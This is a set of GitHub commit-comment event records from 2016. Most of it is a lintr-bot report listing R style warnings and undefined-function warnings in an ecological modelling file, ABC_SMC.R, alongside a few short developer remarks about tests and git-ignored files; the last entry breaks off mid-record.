{"id":"4591824159","type":"CommitCommentEvent","actor":{"login":"martin-g"},"repo":{"name":"wicketstuff/core"},"payload":{"comment":{"id":19102301,"position":7,"line":225,"path":"pom.xml","commit_id":"7572720aac129f034137eabded38c3f2f942c93d","created_at":"2016-09-20T19:13:08Z","updated_at":"2016-09-20T19:13:08Z","body":"Hi @bitstorm !\r\n\r\nWhy this skipping is needed ?\r\nBetter let's fix the tests if they are broken. They were not last time I made a release. And I don't remember anything that could have broke them. What is the issue exactly ?"}},"created_at":"2016-09-20T19:13:08Z"}
{"id":"4591825641","type":"CommitCommentEvent","actor":{"login":"pwalsh"},"repo":{"name":"os-data/eu-structural-funds"},"payload":{"comment":{"id":19102304,"position":132,"line":132,"path":"plumbing/bootstrap.py","commit_id":"a2da73168c29aa4af5f59986de77993339f87a58","created_at":"2016-09-20T19:13:22Z","updated_at":"2016-09-20T19:13:22Z","body":"`raise`"}},"created_at":"2016-09-20T19:13:22Z"}
{"id":"4591832460","type":"CommitCommentEvent","actor":{"login":"xavcz"},"repo":{"name":"xavcz/apollo-cookie-clicker"},"payload":{"comment":{"id":19102321,"position":null,"line":null,"path":null,"commit_id":"8b873ac313c4cd7f04bd0871bb6f7a0b17bc9b45","created_at":"2016-09-20T19:14:32Z","updated_at":"2016-09-20T19:14:32Z","body":"Wow, it was git-ignored globally on my computer! 🍮 Thanks for noticing this! 👍"}},"created_at":"2016-09-20T19:14:32Z"}
{"id":"4591832767","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19102322,"position":null,"line":null,"path":null,"commit_id":"70d08b9d9dc293e4f49118a9d43f74359cac41ef","created_at":"2016-09-20T19:14:33Z","updated_at":"2016-09-20T19:14:33Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:25:68:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L25) *style:* **Commas should always have a space after.**\n```r\n​  diff <- params[target] - cbind(disp_vals, filt_vals, comp_vals)[,target]\n                                                                   ^\n```\n[R/ABC_SMC.R:26:54:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  vals <- weights * dnorm(diff, mean = 0, sd = sigma)  \n                                                     ^~\n```\n[R/ABC_SMC.R:27:12:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​  return( 1/sum(vals) )\n          ~^~\n```\n[R/ABC_SMC.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:65:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:69:40:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:77:21:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L79) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:46:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:82:6:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L82) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in seq_along(sd_vals)) {\n     ^\n```\n[R/ABC_SMC.R:83:7:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L83) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(sd_vals[[i]] == 0.000) {\n      ^\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"one of the community summary statistics shows no variation in your dataset\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:88:10:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:88:10:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L88) *warning:* **no visible global function definition for ‘detMnbsp’**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:91:18:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:18:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:93:18:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:13:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:17:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:16:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:16:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:16:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:21:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:26:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:107:16:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L107) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:114:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L114) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:7:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L118) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:118:10:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:23:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L118) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:118:29:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:139:5:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L139) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:140:28:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L140) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:140:28:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L140) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:148:12:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:148:30:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:19:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:19:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L152) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:19:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:166:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L166) *style:* **Trailing whitespace is superfluous.**\n```r\n​     \n^~~~~\n```\n[R/ABC_SMC.R:170:40:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L170) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                       ^\n```\n[R/ABC_SMC.R:170:53:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L170) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                   ~^~\n```\n[R/ABC_SMC.R:170:59:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L170) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                          ^\n```\n[R/ABC_SMC.R:170:68:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L170) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                                  ~^~\n```\n[R/ABC_SMC.R:173:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L173) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:174:8:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L174) *style:* **Commented code should be removed.**\n```r\n​     # source(\"/Users/janzen/GitHub/STEPCAM/R/modified_dbFD.R\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L175) *style:* **lines should not be more than 80 characters.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:20:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:20:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L175) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:82:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L175) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                                                                                 ^\n```\n[R/ABC_SMC.R:176:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L176) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:177:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L177) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:178:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L178) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:179:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L179) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L188) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:193:14:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L193) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:195:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L195) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:198:19:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L198) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:199:19:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L199) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:200:19:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L200) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:14:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:18:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:17:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L204) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:17:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:206:17:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L206) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum;\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:24:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] = 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:40:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L209) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] = 1\n                                       ^\n```\n[R/ABC_SMC.R:211:24:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] =\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:40:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L211) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] =\n                                       ^\n```\n[R/ABC_SMC.R:212:13:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:27:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:13:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L216) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:216:14:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:34:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:21:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L222) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:222:22:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:224:13:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:38:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:242:54:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L242) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:245:1:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L245) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:9:](https://github.com/thijsjanzen/STEPCAM/blob/70d08b9d9dc293e4f49118a9d43f74359cac41ef/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n        